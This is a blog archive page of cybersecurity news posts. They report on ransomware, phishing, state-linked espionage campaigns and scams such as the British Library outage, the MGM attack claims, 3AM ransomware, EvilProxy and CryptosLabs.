Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label attackers. Show all posts

Why Mid-Sized Businesses Are Attractive Targets for Cyber Criminals

 

An increase in cybersecurity incidents among mid-market firms has been observed in recent years. For example, a survey in the UK revealed that 45% of medium-sized businesses experienced cybercrimes, with phishing attacks being the most common. Despite this, many mid-sized companies struggle with being prepared for such threats, with only 55% having formal incident response plans in place.

Ransomware attacks, in particular, have caused significant financial and operational damage to businesses. A report found that recovery from these attacks took an average of 22 days, with costs often surpassing the ransom demand by fiftyfold.

Mid-sized companies are vulnerable to cyber threats due to limited budgets and resources for cybersecurity measures. With valuable data at stake, these businesses are attractive targets for cybercriminals seeking to profit from selling stolen information. Additionally, mid-sized firms serving as suppliers to larger corporations can make global supply chains more vulnerable to cyber attacks.

The increasing regulatory pressures surrounding data protection also pose challenges for mid-sized businesses in complying with standards such as GDPR and HIPAA. Non-compliance can lead to hefty fines and legal repercussions, making it crucial for these companies to enhance their cybersecurity measures.

To address these challenges, mid-sized firms should take proactive steps to improve their cybersecurity posture. Adopting Public Cloud ERP solutions can significantly enhance security by providing built-in features, regular updates, compliance support, scalability, and advanced threat detection.

By investing in cybersecurity and leveraging cloud-based solutions, mid-market companies can protect their valuable assets, comply with regulations, and maintain trust with customers and partners. This proactive approach can help mitigate the risks posed by evolving cyber threats and ensure the security of business operations in a cost-effective manner.

British Library Hit by Cyber Incident, Disrupting Services

 

The British Library in London, known for its serene study environment and vast collection of 170 million items, has been disrupted by a "cyber incident." This event has led to the shutdown of its website, impeding access to the online catalog, and the cessation of Wi-Fi services. 

Staff members are unable to use computers, creating a predigital atmosphere within the library. Ordering books now involves consulting hardback catalogs or external websites, writing down catalog numbers, and handing them to librarians for verification. The incident has affected various users, including authors and academics, who rely on the library for their work.

Despite the significance of the British Library, the institution has provided minimal information about the incident on social media. The library stated that it is facing a major technology outage due to the cyber incident, impacting both online and on-site services. 

The staff is collaborating with Britain's National Cyber Security Center to investigate the matter. Speculation about the cause of the shutdown abounds among users, with many having to adjust their work plans to accommodate the disruption.

While details remain scarce, other European libraries presume the British Library was deliberately targeted. The National Library of Scotland, for instance, has intensified its monitoring and protection in response to the attack. 

This incident underscores a shift in cybercriminals targeting libraries, which traditionally flew under the radar. Tasmina Islam, a cybersecurity education lecturer, suggests that financial motives may be driving such attacks, as libraries house valuable information, including personal data and intellectual property. She emphasizes the need for libraries and institutions to enhance their security measures.

Within the British Library, employees are puzzled by the event, describing it as a "nightmare." However, not all users are dismayed by the interruption. Eric Langley, a Shakespeare scholar, finds the blackout oddly liberating, allowing him to focus solely on the bard's work. Nevertheless, he acknowledges that an extended disruption would pose challenges.

Europe's Shipping Industry Grapples with Widespread Cyberattack

 

A significant cyberattack has impacted shipping companies across Europe, commencing on Thursday afternoon. The attack, believed to be a Distributed Denial of Service (DDoS) incident, has led to the widespread unavailability of numerous websites. IT teams are currently hard at work, actively addressing and resolving the situation.

Johanna Boijer-Svahnström, the Senior Vice President of Viking Line, discussed the extensive cyberattack that occurred on Thursday. In a statement to HBL, she emphasized that the cyber assault had a notable impact on major shipping companies operating throughout Europe.

"It appears to be a DDOS cyber attack targeting shipping companies across Europe. Our webpages are currently inaccessible, and our IT department is actively working to resolve the issue," Johanna conveyed to HBL.

The Cyber Express reached out to the company to verify the security incident and gather additional information following the cyberattack. Regrettably, at the time of preparing this report, no confirmation has been received from Viking Line.

According to media reports, the Viking Line cyberattack appears to have been a DDoS attack stemming from an overload on the company's website. This cyber assault had a widespread impact, affecting nearly all major shipping companies in the region.

About Viking Line

Viking Line, established in 1959, is a prominent shipping company specializing in cruise, cargo, and passenger services primarily within the Baltic Sea region. The company maintains a fleet of more than 50 vessels offering services in all three categories, with a current workforce of over 2,000 employees.

A recent report citing research conducted by the law firm HFW suggests that the shipping industry is considered an "easy target" for cybercriminals. The same report indicates a notable increase in ransomware attacks, with ransom demands rising by an astounding 350% over the past year.

"Our findings reveal that despite improvements in maritime cybersecurity, the industry remains vulnerable. Shipping organizations are facing a surge in cyberattacks, along with a substantial increase in ransom payment demands. As technology continues to play a larger role across all aspects of shipping, encompassing ship networks, offshore installations, and onshore control centers, the potential for cybersecurity breaches also escalates," reported Heavylift PFI, quoting Tom Walters, a partner at Hollman Fenwick Willan, a global law firm.

Incidents like the Viking Line Cyberattack underscore the critical importance of robust cybersecurity measures within the shipping industry. It serves as a reminder that a proactive approach to cybersecurity across various sectors is imperative to prevent escalating challenges.

Rival Cybercrime Groups Offer Conflicting Accounts of Casino Attack

 

In the latest development, members of the hacking group Scattered Spider have asserted that they were the initial perpetrators of the MGM network breach last week. 

However, the ransomware gang Alphv, also known as Black Cat, countered this claim with a detailed statement on their dark-web platform, insisting that they were the true culprits.

Alphv's statement, while claiming responsibility, left a crucial question unanswered: whether Scattered Spider was acting as an affiliate of Alphv or an independent group utilizing Alphv-developed ransomware. This conflicting narrative is further muddying an already tumultuous news cycle, marked by speculative discussions on social media.

Definitive confirmation regarding the identity of the MGM attacker remains elusive until either the company or law enforcement authorities release public details about the incident. 

Both Scattered Spider and Alphv represent significant cyber threats in their own right, according to experts. Scattered Spider, believed to be comprised of young adults in the U.S. and the U.K., is notorious for employing social engineering tactics in their attacks. 

Charles Carmakal, CTO at Google Cloud's Mandiant, noted their recent use of Alphv's encryption. Their past exploits include a high-profile attack affecting over 130 organizations, resulting in the theft of more than 10,000 employees' login credentials.

Meanwhile, Alphv, thought to be based in Russia, has earned a reputation for conducting ruthless and widespread attacks. Their tactics have included releasing sensitive images from breast cancer patients' examinations while extorting the Lehigh Valley Health Network earlier this year. Notable victims have also included Western Digital and Sun Pharmaceuticals.

In the realm of ransomware, identities are intentionally obscured to hinder law enforcement's efforts to trace attacks back to their source. It's not uncommon for a major ransomware operator to claim credit for an attack initiated by an affiliate. Additionally, a larger group like Alphv could independently carry out an entire attack internally.

Ultimately, MGM, in conjunction with the FBI and third-party cyber incident response firms, will possess the most reliable information regarding the assailant's identity and the specifics of how the breach occurred.

Espionage Group Suspected of Intruding Asian Nation's Power Grid

 

Earlier this year, cyber attackers targeted an undisclosed Asian country's national power grid using ShadowPad malware, commonly associated with entities linked to the Chinese government, according to cybersecurity experts. 

While Symantec did not explicitly attribute the incident to China, they identified the group as RedFly, who infiltrated the network for up to six months, siphoning credentials and targeting multiple computers. 

ShadowPad, which first emerged in 2017, has also been linked to the APT41 hacking group, which researchers have connected to China's Ministry of State Security and the People's Liberation Army. In recent years, various China-linked groups have employed ShadowPad for cyber-espionage activities.

The attack's initial signs emerged on February 28, when ShadowPad was deployed on a single computer, Symantec reported. The malware reappeared in the network on May 17, indicating that the hackers had maintained access for over three months.

Over the following week, the attackers worked to broaden their access to storage devices, collect system credentials, and conceal their tracks. They utilized the legitimate Windows application oleview.exe to gain insights into the victim's network and move laterally.

Dick O'Brien, principal intelligence analyst at Symantec Threat Hunter, expressed concern about the escalating trend of hackers targeting critical national infrastructure (CNI) with malware. He highlighted that attacks on CNI are particularly worrisome due to the potential for serious disruption, and emphasized that this incident is part of a broader pattern.

Experts warn that the frequency of attacks on CNI organizations has risen over the past year, posing a heightened risk of disruptions to power supplies and essential services during times of heightened political tension.

While Symantec has not observed disruptive actions from RedFly, they acknowledge that such actions have occurred in other regions, underscoring the potential threat.

ShadowPad has been identified in cyberattacks on seven electricity grid management facilities in Northern India, as well as Pakistani government agencies, a state bank, and a telecommunications provider. Critical industries in various countries across Asia and Europe have also been targeted with ShadowPad and other malicious tools.

Designed as a successor to Korplug/PlugX, another popular strain among some Chinese espionage groups, ShadowPad briefly appeared on underground forums, making it challenging for researchers to attribute all instances of its use directly to China-based actors.

LockBit Ransomware Falters, Attackers Deploy New '3AM' Malware

 

In a recent cyberattack targeting a construction company, hackers attempted to deploy the LockBit ransomware on a target network but were thwarted. In an unexpected twist, they resorted to a previously unknown ransomware variant called 3AM, successfully infiltrating the system.

The newly discovered ransomware, 3AM, follows a fairly typical pattern by disabling various cybersecurity and backup-related software before encrypting files on the compromised computer. However, it stands out with an unusual theme: the name 3AM, a reference to the eerie hour when only insomniacs, night owls, and malicious hackers are typically active.

Researchers from Symantec highlighted this double-pronged attack in their recent report. It marked the first documented instance of 3AM being used alongside the LockBit ransomware in a single compromised machine.

Dick O'Brien, the principal intelligence analyst for the Symantec threat hunter team, cautioned, "This isn't the first time we've seen attackers employ multiple ransomware families simultaneously, and organizations should be prepared for such scenarios."

Upon gaining access to the target network, the threat actors wasted no time gathering user information and deploying tools for data extraction. They utilized tools like Cobalt Strike and PsExec to escalate privileges and performed reconnaissance tasks such as identifying users and network status. They also sought out other servers for lateral movement and established a new user for persistence. Subsequently, they employed the Wput utility to transfer the victim's files to their FTP server.

Their initial plan was to deploy LockBit ransomware, but the target's robust cybersecurity defenses prevented its execution. Unfortunately for the victim, the attackers had an alternative weapon at their disposal: 3AM ransomware. This malware is characterized by its encryption of files with the ".threeamtime" suffix and references to the time of day in its ransom note.

The ransom note began with an ominous message: "Hello, '3 am' The time of mysticism, isn't it? All your files are mysteriously encrypted, and the systems 'show no signs of life,' the backups disappeared. But we can correct this very quickly and return all your files and operation of the systems to [sic] original state."

In contrast to the creative ransom note, the authors displayed less innovation in the design of the malware itself. 3AM is a 64-bit executable coded in Rust, a language favored by both hackers and defenders. It attempts to terminate various security and backup-related software on the infected machine before proceeding with its primary tasks: scanning the disk, identifying specific file types, encrypting them, delivering the ransom note, and erasing any Volume Shadow (VSS) backup copies of files that could offer a potential lifeline to the victim.

In this particular attack, the hackers only succeeded in deploying 3AM on three machines, with two of them subsequently blocking the malware. However, the third machine was compromised successfully, where LockBit had failed. While the attackers claimed to have stolen sensitive data from this machine, Symantec couldn't independently verify this claim.

When it comes to defending against ransomware attacks, especially multi-faceted ones like this, O'Brien recommends a defense-in-depth strategy. He emphasizes that organizations should focus on addressing all stages of a potential attack rather than solely concentrating on blocking the ransomware payloads. He underscores the importance of early intervention in thwarting cyberattacks, stating that "the earlier you stop an attack, the better."

EvilProxy Phishing Campaign Targets Microsoft 365 Executives Worldwide

 

Cybercriminals have launched an EvilProxy phishing campaign with the aim of infiltrating thousands of Microsoft 365 user accounts across the globe. 

Over a span of three months from March to June, the attackers distributed a barrage of 120,000 phishing emails targeting more than 100 organizations worldwide. The primary objective of this operation was to compromise high-ranking executive accounts, paving the way for subsequent, deeper attacks within these enterprises.

Researchers from Proofpoint have shed light on the ongoing campaign, revealing that it employs a range of phishing strategies, including brand impersonation, scan blocking, and a multi-step infection process. 

These tactics have enabled the attackers to successfully seize control of cloud accounts belonging to top-level executives. Notably, over the past half-year, there has been an alarming surge of over 100% in these takeover incidents. These breaches occurred within organizations that collectively represent 1.5 million employees globally.

The attackers leveraged the EvilProxy phishing-as-a-service platform, utilizing reverse proxy and cookie-injection methods. These techniques allowed them to bypass multi-factor authentication (MFA), which is often touted as a defense mechanism against phishing attacks. The use of tools like EvilProxy, which operate as reverse-proxy hacker tools, is making it increasingly feasible for malicious actors to overcome MFA.

Upon obtaining credentials, the attackers wasted no time in accessing executives' cloud accounts, achieving entry in mere seconds. Subsequently, they maintained control by employing a native Microsoft 365 application to incorporate their own MFA into the "My Sign-Ins" section. The favored method for this action was the "Authenticator App with Notification and Code."

Surprisingly, the researchers noted that there has been a rise in account takeovers among tenants with MFA protection. Their data suggests that at least 35% of all compromised users over the past year had MFA enabled.

The EvilProxy attack typically commences with attackers masquerading as trusted services such as Concur, DocuSign, and Adobe. They send phishing emails from spoofed addresses, purportedly originating from these services, containing links to malicious Microsoft 365 phishing sites.

Clicking on these links initiates a multi-step infection process involving redirects to legitimate sources like YouTube, followed by further redirects utilizing malicious cookies and 404 errors. This convoluted approach is designed to scatter the traffic, minimizing the chances of detection.

Ultimately, the user traffic arrives at an EvilProxy phishing framework—a landing page functioning as a reverse proxy. This page imitates recipient branding and third-party identity providers.

Despite the large number of attacks, the cybercriminals exhibited precision, specifically targeting top-tier executives. C-level executives were the focus in approximately 39% of the attacks, with 17% targeting CFOs and 9% aimed at presidents and CEOs.

The success of this campaign in breaching MFA and its extensive scale underscore the advancing sophistication of phishing attacks. This necessitates organizations to bolster their security measures and adopt proactive cybersecurity intelligence to detect anomalous activities, emerging threats, and potential vulnerabilities.

While the effectiveness of EvilProxy as a phishing tool is acknowledged, there remains a significant gap in public awareness regarding its risks and implications. 

Proofpoint recommends a series of steps to mitigate phishing risks, including blocking and monitoring malicious email threats, identifying account takeovers, detecting unauthorized access to sensitive cloud resources, and isolating potentially malicious sessions initiated through email links.

SolarWinds Hackers Dangle BMWs to Eavesdrop on Diplomats

 

The Russia-backed group responsible for the SolarWinds attack, known as Cloaked Ursa or Nobelium/APT29, has shifted its tactics and is now targeting foreign diplomats working at embassies in Ukraine. Instead of using traditional political lures, the group is employing more personalized approaches to entice victims into clicking on malicious links.

Researchers from Palo Alto Networks' Unit 42 have been monitoring the activities of Cloaked Ursa and discovered that the initial lure in the campaign involved a legitimate flyer advertising the sale of a used BMW sedan in Kyiv. The flyer, which was originally shared by a diplomat within the Polish Ministry of Foreign Affairs, caught the attention of potential victims, particularly new arrivals to the region. 

Exploiting this opportunity, Cloaked Ursa created a counterfeit version of the flyer and sent it to multiple diplomatic missions as a bait for their malware campaign. The malicious message contained a link that promised additional photos of the car, but instead, it executed malware in the background when clicked.

The malware payload used by Cloaked Ursa is JavaScript-based and provides the attackers with a backdoor into the victim's system, enabling them to load further malicious code through a command-and-control connection. 

The group meticulously compiled its target list, using publicly available embassy email addresses for 80% of the victims and unpublished email addresses for the remaining 20%. This deliberate selection aimed to maximize their access to desired networks.

While the researchers observed the campaign being conducted against 22 out of the 80 foreign missions in Ukraine, they suspect that the actual number of targets is higher. The extensive scope of the attacks is remarkable for operations that are typically secretive and narrowly focused.

In a strategic shift, Cloaked Ursa has moved away from using job-related topics as bait and instead crafted lures that appeal to recipients' personal interests and desires. This change aims to increase the campaign's success rate by compromising not only the initial targets but also others within the same organization, extending its reach. 

The researchers noted that these unconventional lures have broad applicability across the diplomatic community and are more likely to be forwarded to other individuals within and outside the organization.

Cloaked Ursa, also known as Nobelium/APT29, is a state-sponsored group associated with Russia's Foreign Intelligence Service (SVR). The group gained notoriety for the SolarWinds attack, which involved a backdoor discovered in December 2020 and affected approximately 18,000 organizations through infected software updates.

Since then, the group has remained active, targeting foreign ministries, diplomats, and the US government, exhibiting sophistication in both tactics and custom malware development.

To mitigate APT cyberattacks like those conducted by Cloaked Ursa, the researchers provided some recommendations for diplomatic personnel. They advised administrators to educate newly assigned diplomats about cybersecurity threats specific to the region before their arrival. 

Additionally, individuals should exercise caution when downloading files, even from seemingly legitimate sources, and be vigilant about URL redirection when using URL-shortening services, as this could be indicative of a phishing attack. Verifying file extension types and avoiding files with mismatched or obfuscated extensions is crucial to prevent falling victim to phishing attempts. 

Finally, the researchers suggested that diplomatic employees disable JavaScript as a preventive measure, rendering JavaScript-based malware unable to execute.

Sharp Increase in Malware Attacks via USB Flash Drives

 

Instances of cybercriminals employing USB drives for malware attacks have seen a significant rise. According to security researchers from Mandiant, there has been a three-fold increase in malware attacks via USB drives aimed at stealing sensitive information during the first half of 2023. These researchers have disclosed details regarding two specific attack campaigns.

One of the attack campaigns, attributed to the China-linked cyberespionage group TEMP.Hex, targeted both public and private organizations in Europe, Asia, and the U.S. The attackers utilized USB flash drives to introduce the SOGU malware into compromised systems and extract valuable data. 

The flash drives contained multiple malicious software and employed a DLL hijacking technique to download the final payload into the memory of the compromised systems. Once executed, the SOGU malware carried out various actions such as capturing screenshots, recording keystrokes, establishing reverse shell connections, and enabling remote desktop connections for executing additional files. 

The stolen data was sent to the attackers' command and control (C2) server using a custom binary protocol over TCP, UDP, or ICMP. Industries targeted by this attack campaign included construction, engineering, government, manufacturing, retail, media, and pharmaceutical sectors.

In an attack campaign, victims were enticed to click on a file that appeared to be a legitimate executable file found in the root folder of a USB drive. Upon executing this file, an infection chain was triggered, leading to the download of a shellcode-based backdoor named SNOWYDRIVE.

The malware not only copied itself to removable drives connected to infected systems but also performed various other operations, such as writing or deleting files, initiating file uploads, and executing reverse shell commands.

Recently, the Check Point Research Team uncovered a new USB-based attack campaign attributed to a China-based group called Camaro Dragon. 

The campaign specifically targeted a healthcare institution in Europe and involved the deployment of several updated versions of malware toolsets, including WispRider and HopperTick. It was reported that Camaro Dragon effectively utilized USB drives to launch attacks in Myanmar, South Korea, Great Britain, India, and Russia.

Organizations are strongly advised to prioritize access restrictions on USB devices and conduct comprehensive scans for malicious files before connecting them to their networks. 

Additionally, it is crucial for organizations to enhance their awareness and understanding of such attack campaigns in order to proactively defend against threats from the outset. It can be achieved by implementing a robust and automated Threat Intelligence Platform (TIP) that provides real-time tactical and technical insights into attacks.

This Threat Actor Targeted NATO Summit Attendees

 

A Russia-linked threat actor known as RomCom has been targeting entities supporting Ukraine, including guests at the 2023 NATO Summit. The summit is taking place in Vilnius, Lithuania, and will discuss the war in Ukraine and new memberships in NATO, including Sweden and Ukraine itself.

RomCom has created malicious documents that are likely to be distributed to supporters of Ukraine. The threat actor appears to have dry-tested the delivery of these documents on June 22, a few days before the command-and-control (C&C) domain used in the campaign went live, BlackBerry explained.

The malicious documents are likely distributed via spear-phishing. They contain an embedded RTF file and OLE objects that initialize an infection chain that garners system information and delivers the RomCom remote access trojan (RAT).

At one stage in the infection chain, a flaw in Microsoft's Support Diagnostic Tool (MSDT) – CVE-2022-30190, also known as Follina – is exploited for remote code execution (RCE).

BlackBerry has identified the C&C domains and victim IPs used in this campaign. All of these were accessed from a single server that has been observed connecting to known RomCom infrastructure.

"Based on the nature of the upcoming NATO Summit and the related lure documents sent out by the threat actor, the intended victims are representatives of Ukraine, foreign organizations, and individuals supporting Ukraine,” BlackBerry says.

BlackBerry has alerted relevant government agencies of this campaign. RomCom is also known as Void Rabisu and Tropical Scorpius, and is associated with the Cuba ransomware. The group was previously believed to be financially motivated, but recent campaigns have shown a shift in tactics and motivation, suggesting that they are now working for the Russian government.

Since at least October 2022, the RomCom backdoor has been used in attacks targeting Ukraine. These attacks have targeted users of Ukraine's Delta situational awareness program and organizations in Ukraine's energy and water utility sectors.

Outside Ukraine, RomCom attacks have targeted a provincial local government helping Ukrainian refugees, a parliament member of a European country, attendees of the Munich Security Conference and the Masters of Digital conference, and a European defense company.

SCARLETEEL Hackers Target AWS Fargate in Latest Cryptojacking Campaign

 

An continuing sophisticated attack effort known as SCARLETEEL continues to target cloud settings, with threat actors currently focusing on Amazon Web Services (AWS) Fargate.

According to a new report from Sysdig security researcher Alessandro Brucato, "Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture."

The cybersecurity firm originally revealed SCARLETEEL in February 2023, describing a complex attack chain that resulted in the theft of confidential information from AWS infrastructure and the installation of bitcoin miners to illicitly profit from the resources of the compromised systems.

However, Sysdig told The Hacker News that it "could be someone copying their methodology and attack patterns." Cado Security's follow-up investigation revealed possible connections to the well-known cryptojacking outfit TeamTNT.

The threat actor's recent action is a continuation of his propensity to target AWS accounts by taking advantage of weak public-facing web apps in order to achieve persistence, steal intellectual property, and maybe earn $4,000 per day utilizing bitcoin miners.

According to Brucato, "The actor discovered and exploited a flaw in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then use it however they wanted."

The rival starts by taking advantage of JupyterLab notebook containers that are set up in a Kubernetes cluster. Using this initial foothold, the adversary conducts reconnaissance on the target network and gathers AWS credentials to gain further access to the victim's environment.

The installation of the AWS command-line tool and the Pacu exploitation framework for later exploitation come next. The assault is notable for using a variety of shell scripts, some of which target AWS Fargate compute engine instances, to retrieve AWS credentials.

"The attacker was observed using the AWS client to connect to Russian systems which are compatible with the S3 protocol," Brucato said, adding the SCARLETEEL actors used stealthy techniques to ensure that data exfiltration events are not captured in CloudTrail logs.

Other actions done by the attacker include the employment of a DDoS botnet virus known as Pandora and the Kubernetes Penetration Testing tool Peirates, all of which point to continued efforts on the side of the actor to monetize the host.

"The SCARLETEEL actors continue to operate against targets in the cloud, including AWS and Kubernetes," Brucato said. 

"Their preferred method of entry is exploitation of open compute services and vulnerable applications. There is a continued focus on monetary gain via crypto mining, but [...] intellectual property is still a priority."



CryptosLabs Scam Ring Preys on French-Speaking Investors, Amasses €480 Million

 

A group of cybersecurity researchers has uncovered the inner workings of a fraudulent organization known as CryptosLabs. This scam ring has allegedly generated illegal profits amounting to €480 million by specifically targeting individuals who speak French in France, Belgium, and Luxembourg since April 2018.

According to a comprehensive report by Group-IB, the scam ring's modus operandi revolves around elaborate investment schemes. They impersonate 40 prominent banks, financial technology companies, asset management firms, and cryptocurrency platforms. The scam infrastructure they have established includes over 350 domains hosted on more than 80 servers.

Group-IB, headquartered in Singapore, describes CryptosLabs as an organized criminal network with a hierarchical structure. The group comprises kingpins, sales agents, developers, and call center operators. These individuals are recruited to lure potential victims by promising high returns on their investments.

"CryptoLabs made their scam schemes more convincing through region-focused tactics, such as hiring French-speaking callers as 'managers' and creating fake landing pages, social media ads, documents, and investment platforms in the French language," Anton Ushakov, deputy head of Group-IB's high-tech crime investigation department in Amsterdam, stated.

"They even impersonated French-dominant businesses to resonate with their target audience better and be successful in exploiting them."

The scam begins by enticing targets through advertisements on social media, search engines, and online investment forums. The scammers masquerade as the "investment division" of the impersonated organization and present attractive investment plans, aiming to obtain the victims' contact details.

Once engaged, the victims are contacted by call center operators who provide them with additional information about the fraudulent platform and the credentials needed for trading. After logging into the platform, victims are encouraged to deposit funds into a virtual balance. They are then shown fabricated performance charts, enticing them to invest more in pursuit of greater profits. However, victims eventually realize they cannot withdraw any funds, even if they pay the requested "release fees."

"After logging in, the victims deposit funds on a virtual balance," Ushakov said. "They are then shown fictitious performance charts that trigger them to invest more for better profits until they realize they cannot withdraw any funds even when paying the 'release fees.'"

Initially, the victims are required to deposit around €200-300. However, the scam is designed to manipulate victims into depositing larger sums by presenting them with false evidence of successful investments.

Group-IB initially uncovered this large-scale scam-as-a-service operation in December 2022. Their investigation traced the group's activities back to 2015 when they were experimenting with various landing pages. CryptosLabs' involvement in investment scams became more prominent in June 2018 after a preparatory period of two months.

A key aspect of the fraudulent campaign is the utilization of a customized scam kit. This kit enables the threat actors to execute, manage, and expand their activities across different stages of the scam, ranging from deceptive social media advertisements to website templates used to facilitate the fraud.

The scam kit also includes auxiliary tools for creating landing pages, a customer relationship management (CRM) service that allows the addition of new managers to each domain, a leads control panel used by scammers to onboard new customers to the trading platform, and a real-time VoIP utility for communicating with victims.

"Analyzing CryptosLabs, it is evident that the threat group has given its activities a well-established structure in terms of operations and headcount, and is likely to expand the scope and scale of its illicit business in the coming years," Ushakov said.

Hackers are Employing This Top Remote Access Tool to Get Unauthorised Access to Your Company's Networks

 

Another genuine enterprise software platform is being misused by cybercriminals to deliver malware and ransomware to unwitting victims. The DFIR Report's cybersecurity analysts identified many threat actors using Action1 RMM, an otherwise benign remote desktop monitoring and management tool. Action1, like any other remote management tool, is used by managed service providers (MSPs) and other IT teams to manage endpoints in a network from a remote location. It can be used to handle software patches, software installation, troubleshooting, and other related tasks.

In accordance to a BleepingComputer study, fraudsters are targeting this software in particular because of the variety of functionality it provides in its free edition. The free plan allows for up to 100 endpoints to be serviced - the only limitation for the free edition, which could make it an appealing tool for thieves.

Several anonymous teams have been found employing Action1 in their ads, but one in particular sticks out - Monti. This gang was discovered last summer by BlackBerry Incident Response Team cybersecurity researchers, and it was later discovered that Monti has many characteristics with the famed Conti syndicate. 

Conti's attacks were typically launched via AnyDesk or Atera rather than Action1. The attackers were also seen utilizing Zoho's ManageEngine Desktop Central. In either instance, the attackers would employ remote monitoring and management tools to install various types of malware, including ransomware, on target endpoints. 

At times, the attackers would send an email imitating a prominent brand, requesting that the victim contact them immediately in order to stop a significant transaction or obtain a large refund. They would contact the victim and demand that they install RMM software, which they would then exploit to infect the target systems. Although the corporation is aware that its software is being abused for bad reasons, it is attempting to assist.

“Last year we rolled-out a threat actor filtering system that scans user activity for suspicious patterns of behavior, automatically suspends potentially malicious accounts, and alerts Action1’s dedicated security team to investigate the issue,” Mike Walters, VP of Vulnerability and Threat Research and co-founder of Action1 Corporation, told BleepingComputer.

Russian APT Hackers Increasingly Attacking NATO Allies in Europe

 

In accordance with the Polish CERT and Military Counterintelligence Service, an ongoing cyberespionage effort linked to a Russian nation-state entity is targeting European government agencies and diplomats in order to collect Western government intelligence on the Ukraine war. According to a Thursday advisory from the two federal agencies, a campaign linked to the Russian 

APT organization Nobelium is targeting government agencies and diplomats involved with NATO and the European Union, as well as African states to a lesser extent. Per the Polish authorities, the hackers are targeting victims using spear-phishing emails that look to be from European embassies, inviting them to a meeting or event at one of the embassies.

The emails comprise malicious documents masquerading as calendar invites or meeting agendas. When victims open these files, they are sent to a hijacked website hosting a trademark Nobelium malware dropper dubbed EnvyScout, which sends malicious .img or .iso files to the victim's machine.

Nobelium previously employed malware concealed in.zip or.iso files, but in the latest operation, hackers load additionally .img files that lack the Mark of the Web feature, a security mechanism designed to prevent people from downloading harmful files. The spyware launches without informing system users.

Once executed, the malware loads additional tools previously connected with Nobelium, such as the command-and-control tool SnowyAmber and the malware downloader QuarterRig, which then exfiltrate the victim's IP address and other system information.

In accordance to the Polish CERT, hackers analyse this information to identify possible targets and evaluate whether they have turned on any antivirus or malware detection tools.
The Polish CERT stated that, in addition to European government institutions and personnel, European nongovernmental companies are also vulnerable to a Nobelium hack. The agency suggests limiting disc file mounting capabilities and enabling software constraints to prevent unprompted file execution to safeguard against hacking.

According to a recent BlackBerry Research and Intelligence report, the campaign has been active since early March and targets victims with outdated network equipment. BlackBerry believes the effort was likely begun by Russian hackers during the February visit of Polish Ambassador Marek Magierowski to the United States.

"We believe the target of Nobelium's campaign is Western countries, especially those in Western Europe, which provide help to Ukraine," BlackBerry researchers wrote.

Nobelium, also known as APT29 and CozyBear, is one of a few Russian cyber-operations groups working against Ukraine and its allies. Researchers suspect the group was also responsible for the SolarWinds supply chain hack, which was detected in December 2020.



The Cybercrime Ecosystem Knits a Profitable Underground Gig Economy

 

Over a 30-month period, cybercriminal groups and threat groups advertised for workers with expertise in software development, IT infrastructure maintenance, and designing fraudulent websites and email campaigns. In accordance with a new report from cybersecurity firm Kaspersky, demand for technically skilled individuals continues, but it spiked during the coronavirus pandemic, with double the average job advertisements coming during March 2020, the first month of the pandemic. 

The analysis gathered messages from 155 Dark Web forums between January 2020 and June 2022, focusing on those that mentioned employment — either by cybercriminal groups or individuals looking for work. The majority of job postings (83%) were from threat groups looking for highly skilled workers, such as developers (61%), attack specialists (16%), and fraudulent website designers (10%).

As per Polina Bochkareva, a security services analyst at Kaspersky, enhancing defenses has compelled attackers to optimize their tools and techniques, driving the need for more technical experts.

"Business related to illegal activities is growing on underground markets, and technologies are developing along with it," she says. "All this leads to the fact that attacks are also developing, which requires more skilled workers."

The data on underground jobs reveals a spike in activity in cybercriminal services as well as the professionalization of the cybercrime ecosystem. According to a December report, ransomware groups have become much more efficient as they have turned specific aspects of operations into services, such as offering ransomware-as-a-service (RaaS), running bug bounties, and forming sales teams.

Furthermore, initial access brokers have productized the opportunistic compromise of enterprise networks and systems, frequently selling that access to third parties. According to the Kaspersky report, such a segment of labor necessitates the use of technically skilled individuals to develop and support complex features.

"The ads we analyzed also suggest that a substantial number of people are willing to engage in illicit or semilegal activities despite the accompanying risks," the report stated. "In particular, many turn to the shadow market for extra income in a crisis."

Pandemic caused spike 

A similar crisis sparked a surge in activity on Dark Web forums in early 2020. The pandemic, with its sudden layoffs and work-from-home mandates, fueled significant activity in the cybercrime underground, with 2020 seeing the highest number of employment-related posts. Overall, 41% of advertisements and job-seeking inquiries were posted on the Dark Web during the year, which is about average. However, March 2020 was the first month of worldwide lockdowns and saw approximately 6% of all postings, roughly double the average rate.

"Some ... living in the region suffered from the reduction of income, took a mandatory furlough, or lost their jobs altogether, which subsequently resulted in rising unemployment levels," Kaspersky stated in the report. "Some job seekers lost all hope to find steady, legitimate employment and began to search on Dark Web forums, spawning a surge of resumes there. As a result, we observed the highest ad numbers, both from prospective employers and job seekers."

Personal crises emerged to drive some technically inclined workers to seek employment with cybercriminal organizations. A common refrain in job advertisements is that applicants should not be addicted to drugs or alcohol.

"Teamwork skills, stable connection, no alcohol or drug addictions," read one job posting's translated requirements in the Kaspersky report.

"Dirty Work"

In many cases, the terms of the Dark Web jobs were similar to those of legitimate jobs, such as full-time employment, paid time off, and regular pay increases, with salaries ranging from $1,300 to $4,000 per month. However, the majority did not have an employment contract, and only 10% included a promise to pay salaries on time. The underground employment opportunities were dubbed "dirty jobs" in the report.

"Many are drawn by expectations of easy money and large financial gain," the report stated. "Most times, this is only an illusion. Salaries offered on the Dark Web are seldom significantly higher than those you can earn legally."

Reverse engineers had the highest potential median salary of $4,000 per month, with attack specialists and developers coming in second and third with promises of $2,500 and $2,000, respectively. However, the majority of offers (61%) were geared toward developers. According to Kaspersky's Bochkareva, these workers are the key to the cybercriminal underground.

"The most sought-after professionals were developers and attack specialists, particularly for coding malicious programs, phishing websites, and planning and implementing attacks," she says.

Report: Tax Preparation Software Returned Personal Consumer Data to Meta and Google

 

As per The Markup, popular tax preparation software such as TaxAct, TaxSlayer, and H&R Block sent sensitive financial information to Facebook's parent company Meta via its widely used code known as a pixel, which helps developers track user activity on their sites. 

In accordance with a report published on Tuesday by The Verge, Meta pixel trackers in the software sent information such as names, email addresses, income information, and refund amounts to Meta, violating its policies. The Markup also discovered that TaxAct sent similar financial data to Google via its analytics tool, though the data did not include names.

According to CNBC, Meta employs tiny pixels that publishers and businesses embed on their websites. When you visit, the dots send a message back to Facebook. It also enables businesses to target advertisements to people based on previous websites they have visited.

